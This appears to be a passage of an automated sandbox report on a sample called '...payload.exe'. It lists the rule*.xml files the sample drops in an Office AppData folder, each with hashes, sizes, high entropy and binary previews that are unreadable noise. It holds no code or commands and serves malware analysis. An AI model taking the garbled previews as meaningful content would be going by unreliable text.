                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1696
                                                                                                                          Entropy (8bit):7.89155691335038
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:tDGFvB9RuO8KoqmKvHNldtoB3/DVm5ZEg+mQBD:Ej9OKo8XdtqDVm5ZcmQp
                                                                                                                          MD5:3F363E22CA204EDA40C0A8C709EC204B
                                                                                                                          SHA1:92048D3433C3E6E87B1C7A91EA4E6FBCBFAE99D7
                                                                                                                          SHA-256:DE15F146810D48F40D34830523582A3D3CF591440E4D913D2C47B13BC083FA5F
                                                                                                                          SHA-512:8C5F88E0B6C9B89A70D6790740BC0CB7BE83634E56E6D3DAEC3CB9F094704475787C93B0180E3028AD5142676344009776D22BD8EA8C0D4F3980BFE9D8F23EA3
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?u0.i>.s..@....d.,].o....'.? .6t...d..$.,.b....0..9....l..]..,>m...qW.Y.(..0.4{<..........vUVE........J...\@..D..l.!...q`5..2..C.rIm1.....B..."...[..d.....yq-....H6.@..&.a..rA3.R...Mu.e...? .j.8m(...;..1........D.|...D..%.~..k..]..<@..+...;N.\...Ml........m.+.?.]...w...`B.D..^S.x....9.3.....]zE..[.0-....C.#.c...??6..~...+.,..&^..4.,j.'........,........&h%......|.B.........GfDc...N.....e,......odV.... .).d..S.............6..B.+.&..&=......;/.o>....!a~.U.h..>..wvI....!.R"+oH.........^...p)p$.....w5..B........`...)..@..U...=G.B.),+.e..").5.!....o....0o.` U$....!.EC.bsz.....xW..B.'..:o..-.b....t?..D..a.2.Y..z<....-I.>..;....'~|.H...% d..Ef.p..B.J.5...~F...9......Z..._{.H.-.%..>~.vl+....NF...!..3..q>.}).`=..H.W.a....!...r.%..=..%p:.^D.pS..+...2#^.Q6....!H:..Y....V..(.~r..h.O.!..B.C..W.g\cf%.Z.n.e[...wb..ga..M,9..}Ou....x..me.)R.[k./?OW..N.T[z..xl..).iy.Z.....N...s.......m..Ta...1....D.!`$...*-tad..D....L$..v.M.f..?.e.a..t..Z...i.w._....@S.8.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703501v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1733
                                                                                                                          Entropy (8bit):7.8778766351071745
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:xorKTsobOUzy4kBBHox0CP2098rSVnZ4gn2QMvzuR3q6nMBa7+qb71s/OYOBeMbD:xRIobOUOHA/VnGT7CMBaSqtceBFD
                                                                                                                          MD5:1F7B49C96AB2E6A9E6EAB9B23CB9585B
                                                                                                                          SHA1:A61A4D8C091A53EDE15A32E2DF23F313BEBA3834
                                                                                                                          SHA-256:36B05404E9C2B10C957B799F586D99830399A624C41250AEB8F7948EAD0CEC19
                                                                                                                          SHA-512:B1C08058D14D16DEE58CBE11E789C8A8B5412FC34207B7D3BC7DF41F31D993C807EE5275D690DE74E14C0574D66E8DAD33F95BA1591D9B473367E5297F9D4239
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?..ZG.pc...0N.+.......r...N..^..w...........m..........>....9.~.)I...a+.......A.Q..$;...%H4.j.@..*.4g...xl..i`.....B.j.A.ck.JY2.p.,Y|....F?.v>)2Lm.T.hV.9..HXf..$...4&...?..].{Ac..[^...q-N.i@...g.....Dw..C.r]....A.Vc./..+?.j{..VK..4..G.]......nF.5.B.f......DV..|.{'H.N..Q...T$/>-......H.Eq.y..#...`...a..X...3|.Q+.$.g$.Jg.....)..].....<.q=.....)}....'v"..v....p..]...#.:..M....QI| .`.'...)":-..........O.I(..o.]cF....9.........8TG,]....?......d.a...|.M..J......q.;.*-......V.P....G...(.Z.........@.&E.... ..(..3..7......K..mlQhL..V...26.lP.f....G.....\.....Kz..u..U5..H..l.,.@.KL\8. .[..h;.}.H..+.)..)..i........d..z..{.dZu..7.h.....SM.......iR.......A.)......C..x...i..s....N..6.(x...A...{..@..k9....-........I1......4.OL.O...IfAJJ.wi[...,.E...,....$..........qu?<$.x.D..%..\.......r."...@a...E@p@.WG..R...l.7..J+.i.@..O.t..;%jq.\.\)W|%..0.#4h2?.Mz.JD..).<$.w{...........8."...^.D`_...k];....V.....e.l7.G.....&........rZn..v. .r......B...la..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703550v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1706
                                                                                                                          Entropy (8bit):7.881686967677773
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:8jhD+6mGWoXJhyekGXOI8/A6Zmnziz7RYuTQw4lD:UiXTzcOzA6Zmzc7RYEQ5
                                                                                                                          MD5:AF40C2FC6A634856A81E0A1EC912410E
                                                                                                                          SHA1:EEF9E8ACD319668DB9C17EB3566F51992D305D00
                                                                                                                          SHA-256:6B64AA3BFE45B2933689C62F369E2DF494CEF3C6A33624919288AE976AC6E92F
                                                                                                                          SHA-512:078679575FEB181C657EC008A0BA0A961FD16FB36225764CD325E207548F3727F9C43703C20368040390386830C91D415258AC53F4513D7FE383419CBD48DDD1
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?6+......X..X....,^...ZJ8...s..;..l..b..p....?=O..L.-..x...>.#,...V!.W...d..K.J.m...../.j ...7..6..r.S!*....U.'0. f.~.|0...v....v.!\)~....6......#.M..B.K=..._..p......j...g.cSn........#....."e.[..OE.)....z..k.I[.$.P.l@.I.....&.....a.[....{.d[M.b.F..{..H..;..Q.....7....+...O...<.4..T..zH...Ls.#......a.<\...i..qj..'1..P....y...p..D..e.J.@.8.......0.t...z+uG.K.o.......s....x.$.o.W....A...}cb.*......l.\.n......RI....>...O.l..-.......In.....M\.N.;...CfiwuGR.^..x.&."#}..N....Q(.M.K.X}s.....8..JD.../...M.'{......eS[.w"$.....s.....:.&...F+l.uX..:;......x..F.XX?.1.;,..C.A..j..c....R.H.E=D.....P..E.Q.\..@..+1V.B..z`4.&._.['.t6..6.@...~.4{....4.)'..U.......m.......\>....(- .D..~P..y.ph.wY..?..lp..TT.*.!....*B...#<..".C...66...]...v%..8...5.~%.Z..=~.l.@s.[../ a.Z..=...;.j..<....KK.Z...8..sGB;..j...1.....E...A*q........K.vb.E.S..H.....j...=B..w......5k....'.G...SG.#T...uj@!......E.b..EyS=...O.W...qx...N./|Dt..k(...S......R...;..djO..3.?......p...{.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703551v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1743
                                                                                                                          Entropy (8bit):7.891759783111532
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:F1S+GIByon1TX/TW+ZT5QbC4dgcgJ069KOkMBUD:F1Snm31G+ZlMC4WJFKO7A
                                                                                                                          MD5:DADBC85C3B599111478BB5CEB7025361
                                                                                                                          SHA1:FFE6D376ACE71CA7B49085B25665C3F5387CF2B5
                                                                                                                          SHA-256:5E29387F97717197FA4AF87BD8CC76654DC35FB1CEC46EDDD673635AB4A5BB48
                                                                                                                          SHA-512:6DA26D68CEA6486AF2A09CA2E7CA6864BD0DA5AF9257C60F28B951F33B81C15136E78DF8AF0D06B0BBC5884E9FE0F28289A743ABB9C271A04897F57E66F51C86
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?Ov.....F...3h..V.!BE$........W..^B.^s.xM.....w...~+........z9.._.Wk.(m...b:..[j...J".#H{..>=......+.=...[. ......`....).I..B.`....u\s..o....f......i..4n/UZ.x.G%b&.w.P.vS.....&~.H[.y....3..!..1L-.!.....q.cd.&.....j...u*..v.c.'..D..F.?p./H....okp..`.....Y<.h@.}..5.)('K~..+Qj..Ip.ns........W,......\.w.^P.p...PT.7\.........4.!.b...c.h.......z.~Z.b...z.".....v......|...s.1...........u......*@C.z....Y.*]/c>5.T.D9"1......O..C..1e[i,....0.V.u.".x.}....R.}.D.A.<.......S/.}...va.CR.7...v.i+....a...G..N........B11k.?.F.t...^..^..d.Fl...........w...*s..RR......}../..K.....^d0.D..........D..M.4.N9.........qh.....}>.v._..F...]`."x.r....^......:...>.U...c..'..)=.K%..y?.....U.,l....Fg.....8..%..`ZHc65^U27.2.+..t...u}%..P&_..y.......h...0.....3.\.p6.#+^`$....I..M.lI.....N.Z.f!.t...@.z.....c..rz.;E.A:.....,....#`!....t#*e....n..7S.%....[....i...:..~...[v...S..+...,........o..Q..(Y.-...<4....hN..A....3|w..#2..q1..*D..C..U.QO.ds....t....r-...p..J./b.+

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703600v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1692
                                                                                                                          Entropy (8bit):7.893041805372176
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:tZTuTczXLKe/2zC8JDOL5T62ensKr86eNHXlxMg61cS9gD:XS4zbd2zCyCLPensKr8PNHHo1cS98
                                                                                                                          MD5:D2019C79C0B9667EE061E63B777FB106
                                                                                                                          SHA1:067E2B6D864E5149DEA353BDC1C97DCCA90ADBDE
                                                                                                                          SHA-256:07F71D64A4B42E117F91463C55FD1426F6CD072153985C2B633C0A697D2DD46B
                                                                                                                          SHA-512:6A47BF5294C25981A73F498BE227E6442D1B0EEF14374F8EE34502733CB8EEDFE39BE96D33B6554C42D946EFA0BC61E4DC3FEA8A60E0F61C7931D263F5ECB9F3
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?Q...o!..UC......q.&}g....m.sO..)9.xK.}.+..0.&4CQ....i2SsT.;..E.Dm)..T.}.zG...c....6.e._V.?|@.............yh..cp.. x.....R.j:.&.4.<..R..R..~).h..i...L`.o!h{...E0..X.u..(...I-.1..%g|D..X...........Y.3..&,..Uj.z...........t..!....s.sr.)........QK.<9...EC...(].I....@\.....i.q_.^.......,` %..=6.sV..v.1.....6..w1...Y|.;.....".......=fT...^.6.A(,.....n|.......K.4[.,V.&...}U*].8.......v*C3..[.7.7s..._`..i..x.k.gk.....FGG..(cA.i;r......=..N..W...........P..W!......g......Z.....[..,zS.u....t.;]>.s.~.sK..g%H<.q._..FTZ....T9)(..w.EY.r-..zdq....6..8%6G....i..\.hQ.g.J...2.I.xoU....C.d%..<.=.....[.._...S/...........'.........A>...]..I..n....;=.8.cr....].Z....[.../..l..$....Y..q.4 ._....]..'b\0:...._...=.M.........an..M.+oi..PQTA.I....c...X..s.....6..b.<qr..7....GP/x.......Pt..v`Y./.....v...na.9......r..;.j...-....D~......P..'..s.;.a.M.9q.{...8....qC..N.e.......cL.\....{..9.y.]..ogD...H.......:..[..-.Z.#.......5....K.s1<56.iv.N.....]..5.h:. ..9

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703601v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1729
                                                                                                                          Entropy (8bit):7.887328866909697
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:B4O4Epitniqy6v1qp0p1yAx1hvl9nQegfD6rznD:B4Jlniqy41qKp1lx1hNBFgfDqD
                                                                                                                          MD5:FB265212685C1C534634FA45E22CCF62
                                                                                                                          SHA1:4B66BD9B50E16559A6EB0FDB0ED87D46CBDF03C3
                                                                                                                          SHA-256:4349F22E27D197C34F622B1FB45A7E95B632AA38F5775563D82689592EA4E069
                                                                                                                          SHA-512:5AAFBE5B6B024BBF1A7AF37374950E1FE93027978F8291CCBD31C1E9FED340E7415CC3A55F64C1DD4BD27F4C7848F8A1790F53FF4B2034B8A5F50F55CFA61687
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<? .h4e.&..*].Y....."Uh..l&...sCV......#......^}.Y.A...;..rdMp...v...i.B.X<...3.wO.w`x..(`..1..&.<..IZz.........a..iJ.(.Fw.....\.l..m].....yl....,].....,:d..#.fp.Z.n.pN..8..C..'.<....RL*.....S....S...^W.#o.....3.Y....39..r..v|..WM..e.i..{a..zC..#.j....T=l.......$........'...].7.`.+..1Kc_.H....U6..3"..(.F..4.f.,e.].?;t..v....T%.(%..e1O..$...r.*..!.\+jZF....ZO....o>w...s...7r...pn..T.~wo...m7s.7..D.6Kh..2.iTLv.)...t..@.37.p.'Y.i........z.!E..A....V..w;h.g.....5.cEC......Y.#....yF..ic.B.BFE ..S..!.@.....O..yQy..`...T...?9..Z...F%f.[19X.,.I.Z..L.kDI.Rxf....=Q+.dl......=...'.......1Y....-..a..`..S..A3s.n....#.~.....+._.$....Lt..o.......S.g.-......C.]c....u}.#..._.t/...e....nU.%....V..v...D[.{..1..)..G.dF..r9.c..e..........S...`(@.Fy..uV...*.U..;-j6..7.6....5Y...]..H.8.;...#.{&..y.h...:..:&$.$.\[.........b.../.+."..I8..6......L8......-e.z.'...^.m.eE14.]Q......g....:..iX..>,..*Hr.+a.>.C...5:.X..G.h%.......l..&....tTMy.:X.oa..d.9E,...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703650v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1694
                                                                                                                          Entropy (8bit):7.856216484611749
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:y9hf+MlHJc2aKBg5h89zaf0HbHq+TuyW4ExD:Ih2WHa2aVzwzayzuB75
                                                                                                                          MD5:CED34ACEBCD9C5687677A76806F0D0AD
                                                                                                                          SHA1:4416C6C60CC6280C8541C2068FB79F154376697C
                                                                                                                          SHA-256:37372B622CF35F84B858141F27E8A433EC28AFF43D16DDF7617FE443B5AB92A0
                                                                                                                          SHA-512:FE3FBDAC792D467D63882659348AC1680736F1A4F1F5B8ADCBBA88177601D79A1C1548B0535C445B80AAE17D7A5035D1C4434257C6034EE3FFCCC4711DE6E06F
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?. ."G.v.....%....w..~)G...[N.....D7......E:K.TnW+.....X......{s2y.u{...J[.......E.E........|.....#..J.R...t.\....}..W8.1./..:.r$7a.vD.J.t.vp.!/.i.\8.p6. ..&.%.Y@..>....:.v4.;M...]....Yu.Za....n..lP..G{..Jy.....m...z...;.t....E....]`+...j(?{..0...`.<... #.....c*.C............-..9...u.....v..qC...t.LpdL.....?vW.j..9s.j.....*X...,.R3....wG.up.a...i.\..V.;....6.>....YT.....tw.e....)..S.n.e.o......f]~K...X.D.z.1..HY.:...B.E..G...E7.D.......a`.]..mf.i...YWR......T.V....q.L.........4....<Em.2......u.".)......@b..vc.+...C.b..W.;...c).3..va......#....2....*.3`.f....yTS..(_v...]L#U:......>#....8.dN:..@.X6..de.....d|i.<..>....U...].!...v..E.8....9p..t...".._..b..H2..l...j.....h.Q....KR.......$7......R:a..OS<8GD..uK.k.. ......L@..E~-....$.Kw..p...7...7y.gq...A..(.}..4..._..w..a.._[..g.Y9.a.....M.....w...l...7qW.}..1o...D`&....=G.zeM.....]..W....r......t..3.@2...6Q.=i ..)..Q ......f4.z.E(...P.r.....eF.R....Hj .!...-....L...H.......

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703651v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1731
                                                                                                                          Entropy (8bit):7.8922382590891305
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:sAIy3nIBJ1UT0J0UH4Q1dX8cna9Cwp1fvFJD:sAIy3G0pQ1dX8s2xLfv/
                                                                                                                          MD5:EE5EFE95AF559EC4D9A6233AEA76C8A2
                                                                                                                          SHA1:C36953F8F2D6765DFD65B4EA617140EC9AE0F5AF
                                                                                                                          SHA-256:848E6C87DDF3D2EE10C58219C22C03AC1ED57867D76311E5AA01DC5B706EC1D1
                                                                                                                          SHA-512:9C61E40444E2AAAA55F0279070B24BDC468A757AE158DFE597B1F2BB5C4D74D1CBEB06810BC478E085D3F4BBE9F56234BF50E6265EB0AD45334A11232D3E2079
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?.&.@...{H.ARbT..0.}g.Dhn...k..LN...ok.*j.....'..8....Q<.y..-OH...2....s.).....w...>E..P...<.D[....A....}...c.<..s...=..KE..r..Da...f.pAcn...t........k...Ui.....-8.T.....Id..60....0=.......x......W..a.<..A.....e..[..LK.C....KW[.F...n......A_...(m..{..(....m-ble.Z.o.3J....g....3..2.UQ..N.."l,<..>...y...E.m..B]....S.~.|.W..p....6jd.p..:c-.#a.{.......=...lv..:f.............m..%......9<../...M......5#..9Z@J.sQ.'.`C...2}.p.>c...)..^..V...M...D'.......8o...... .. .`..}p..L.......O.2.Mi.\..E.'...9.L....D*.g.....U....K..n.R4.Sq`.B....b....5PL>..X.....k-.u.....J+..(21.1.7....k80Q..U..F. .iU..(g..9.W0......}..:...f.\1n.]..1!.3...........k..3r.`6Z)<....}..|U...k.!..tR../.q...`A#..U.\...n.e.?SxT.....t..g.#...3QIu.Mq........~5;d2.wE.~2..V~.~...'..Q|W.RF...r1[....mP......r....;.@.T.m..u'...I..X..i.8"...Cs.;P.}..uPT...Ow..z....j.....7.j...........). ...^.j......).9.MzB.&..`'.....8.E.3=....p.m..\V.'..aC.E....>...+{.....x.G.dir..z....v....b

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703700v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1712
                                                                                                                          Entropy (8bit):7.90191807663821
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:L7Dhajmag6gQOAKNe+m2By33HOfQiRw5mD:LfAjmaUAr2wnH+e5+
                                                                                                                          MD5:1332C988F90A2EC04290250DFE4351A2
                                                                                                                          SHA1:0A21AB22276BC9C863639D5D46FE909D57E31FCE
                                                                                                                          SHA-256:0C31A6DBFE2854DE86C6E1AE9E0B96F7DF3023CED0A993BD9FA3B6E5BD64D130
                                                                                                                          SHA-512:589A6D3D7BCAC4CA77EFC0C03ECD981D7B5053191A4EADC749AEC802FD0F5BED53512F18695C6542C8543E2E7EDEAB1CE85A249476531669456BCCD436BD65CF
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?N_ i.S/j..>l..u.X...<..O..o.....Hp.Ze..._+. ...;[u..._.X._...A.*J8."5.=....g..;_.1^....~.......l.....uz.^8$8ymA]J............".m.i8..#.@I/...3$mY.r...w..LN...h%;.Y....v .l....@.i.>..N.M..>.Gi..J.....6...d....X..1......a...EL..p...Z....m.....O6./'..'.........$.6.'....X....Z......NZ4A..Z.n...h..."....oH.rx...f..2...^g.w7.<.L.zz=.v]!\._..-.,...p).H.P...H.j..Evv.7......"}B.......e.E6..,.....X....d{g.:!...9..0u.@..1..a....$ T..|v....nIU..2..v_ .......fj..j<....j..b.p.~.`........n.........#...B..3... ...I........&?8.x...I...~..m.fIq......_.m...G...d..]>.......*..?c...$.t"..k..`T....2#..[.._q..0.=`.......pC...{.......2.O.d?...D*..........5:!.d-.5.....+=..1HK.......)....z.f...FX.I.!.c=..g.....;..l..Cy.Z.1.u..>...y...#..G....eF...vV...-...G......zYn+..+...[..h....a{.\ip..%..._YW.CB...<n).q .j..$.)..Xd`H&\.....Pi...&&`g. .5.q0........|T..Y..Q..m...u.....Tk...N..A%7..73#K.8^...d...Q.IF<.n..L....._..K+...D..7R=;P..J./........:I2..N.E..=.S..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703701v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1749
                                                                                                                          Entropy (8bit):7.874527331881119
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:ghjZcc5/AD5JtLNVfSglWFr4np6y7ndU5KyQuX/Nk1We0xDm2f6zqNbD:gh1341JtphWx4nVndU5Ky3CV0TkAD
                                                                                                                          MD5:A6939FA75AED596A9345D3CA3602A329
                                                                                                                          SHA1:4874118691B74B4BCC9F381391852F6BEB00BA45
                                                                                                                          SHA-256:CB04F4AA0BDC0CE7A9D6461788F0081518E62C84776AF6C6319AAE16F0FFA7D8
                                                                                                                          SHA-512:D3DAB5E0A6D351AEFE62C3B85CB7FAB6DF76A4113838492DEDA280F0F1856C4CCEE93A99133F8051A268C47A54016BC8DA2452A52B999032D4F501B375BED789
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?./H...h..D.]...e.T"\._.D.+...;bM....;..w.5H1....?............t!..sg.r#..E.....>q...U.yB..s..n.P..f. ..c..Pzh*...<nT.....%./>..e...%.E.5...xQ...+..z....!.Hn..qBF..../+..8.......E...S..X.B_4%...e.`..{....&..:.-.....M....^...<..z.".P..X.e.V.M..<,.C,...%..[.{<Vq5..D:j]x.tC.Y.4.D.5Q.'m".GX.1~.i..KW...Va......?....m..Y.V-.m.n(.....2e..s.+..%.......$o...*..\#...X`..9.a.K.... .8d.Y..V....8E<.......M....7.3.E......n...A.#XFcp...k....2.|...7......t.sV.......f...]c.1E..+..!k..q=..V.C....3t....Qp.E...c.L...H.?.r..l.:.@H......EZ..Gs;..!.1...4.$.Lg.|.......[.}.:.....Y..'.8_.ONj1...1...M..[.....u.7..C...gt...vzy.j.MSO.....D.XC{$.zG.k...Q...&..HgT....e.<.v.t.. .e..+.f.Vfe... .+..0U.YS.(.7..fl<:..4..A.n.K..F.].V].gX.."...LF^W..F...ej.. .~....-..8....K..bt........l..HX_Z...~O..V...7.....6.dM..qL.>c....?...xcs.s......>.ARn..{K....v{..{..8(.F..<..t_ ...9jhWn..jtu...4D.b.o/>R9..82.q..,.R.w.t.ln3...)^......:8R0..%..QRS.Q..o,P!t5...O3H.... .!.`...5,h...0.L.ZxgZ.@

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703750v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1734
                                                                                                                          Entropy (8bit):7.87464631885378
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:DVPy34X6UQoK+lo89CB5CLXw3imP8qYMc6dfeD:DV634LRX9CB5CTwymEtMPdfm
                                                                                                                          MD5:6EAEFAC8031C7454DFF6BFB1042B1DA3
                                                                                                                          SHA1:CA3617C54E58A5C5079D7DDA55A0FC39F3CEAC06
                                                                                                                          SHA-256:0D50788CED378CFD0A333C019AF0DBE437A3147C55EE42106D70BB5FA3A7A5F1
                                                                                                                          SHA-512:DECE89020BC08E45F087BDB1BD80E91AB7475EBA846C8144F35A7A2DEAD51441E26337167EEF39CBD9CFD09AB4C0E113454748E2121E94FF5B3CC732EA984242
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?.xF.cq.....f.;..9.l.D.g...v..?\.m.$.Q.A...0,....(..~.{.v.G...`..].v...R>......Z.Ok..B.."..^0W.. ...0...Y.....^Y.vk.O....+..}.....d..}.l....a....O....,....F.`;<.?.z...=...J......k.$)2.....T...G.w..u$II3..T...P....%<....f ...3x......U.k..O.5..6.uV.*B_..;..8.I.&....z..}..H..I.V}.......M+..w.+Ml..Ho....n.......]....v.7..%..{-..V.S..(3.._..........3.x.+.. H.#654]K...{U...6!....Z...=`E...Q.q..l..'.f+.~.g...(.c.F.'.V...X.....w0P{...y.f..(.)h.!qb....!.*(.\...&$....5]GD.Hl..y ..\N ...J....Fqo^Og.cEW....5|.!......c.7.y:;LbF..FX.z..0.p...a.y.q@..3p.....n2mVL..}..........p.......,a...!...`w...m_...uw4.U>...aYh.d[.d....g..T.>....}.S0..s,i.Br.7.'.dg.......*........k&...A..:...p).(.T...(..Aa....G.....tY.4)y...1..wG...L.zG..+9..v.[........H..........Y.......Z.k..M+L.a.//..g4n....S...?'x.!qx..(..`....).3.....q....}...1..LFM<.p].h..Q...`U...^..U$4....Z....I.zi[k..s..=.g......-S...U.u..Q.Hq...4H..+.X..-oF.e..........YR.&H-*U..i....l..E....C.x.m.pg.....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703751v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1771
                                                                                                                          Entropy (8bit):7.891458266339645
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:m11OINOPiD1uQsvsJl66jzuSmL3muoiW2GrwK6UD:m1IxPiJuQsUDjDq3+2G8Kp
                                                                                                                          MD5:E786747445D47CA9A3666DC730269607
                                                                                                                          SHA1:6F474DF75665E572DF9B0A91710CC5EC9687C8C7
                                                                                                                          SHA-256:316F110E18B4BA5EEB0CF39EEE71E7226C03C5F84E40C5ADB0E4296992447788
                                                                                                                          SHA-512:7AA7B9490DBD624645CEB457DC4142B84A96D1ABCEA2CA2A437A0771BC5940D2D276B07F45210EC545E1DED6821F9E03CA9229616AEE9477C973305FD6CFA9E0
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?....S..3d.J%.L..1{.......~.L8...l5.A....Le.4."..r...*.&y.U.m...Y.N9.|.D%..!...3.......LtD.M.(m"...4.l.zl.'...q.....c./}.\..|C,......b.=+.....n_..kT.....=.._1..m..a.mt..g..wC....K'.......Kd..hk.G.6....pad....K..l.U..IE.*...2.H).(!. r..F.Dse......#....9..C.i.....X...SN..n..o..P^.L..39...*M.5w$...N<..0.A....+.....B...v.K.....)...%.'....G+.o.z:$... Aa.-.'J.H..~3E.n.#....HK....C....!......EI.T.H..+..]R..6.T./.u."??...$.t....uV.n.6...w...|n.g.t.#b}.....@.1..'.*..Dz.....2..6q..E.7...B..V.../.....y._.=.S.x2z(..p,2#.....!.yx\............S..]V...r5....x@%.r...tf.Y.p.!.........A..}...^..1..~.@.H..|..ZV...a...F.,..(...qo..[..-...@{...EPmA.a.|....R...Z.c#..\h!. x.P...."c.....R.i.o~.G..\n A........FS......"..^*.$q...F='....s.-.n.:.~z....g....q.).[z.Z.%..."...@Y1nQ.i..Z?..R.4%..,.8..*.9......vf.@.|..O.*-..a....._rx_.a......9.....Q\....q&. .....T>..2...p.f".L...<...."P."...$w"J.f.t....dP..... d...6v.1]f....8..q:E..I..EJ^T.n...A.W..Xe...l.{....=.gxe.7`....~

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703800v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1716
                                                                                                                          Entropy (8bit):7.878633126825707
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:v7vLJO5mPyq/XE6yiPfeKBJo5fvDVE2DNNWERJEPQWFEbksdtZyAi+bD:bLJE0XVPfeyJ+pDblJEPFExdtZni8D
                                                                                                                          MD5:673E97E11EB0B7C2863D108929E40CEA
                                                                                                                          SHA1:2D370EE35C302D2F3EB670EB697685937B1FB449
                                                                                                                          SHA-256:B05AA313BE7A16C2574B43358479B968B20B132284F63884128F50A3A3816F9F
                                                                                                                          SHA-512:760AFA24CBA2FACE9DAA5E49ACEB6BA57CF0DC9EBBBFD542754925566036DDDEFAF6175959C5B47B7553F8832C31F1A4E40080DB3DBDFEDB6291BA7FCA0F9E8B
                                                                                                                          Malicious:false
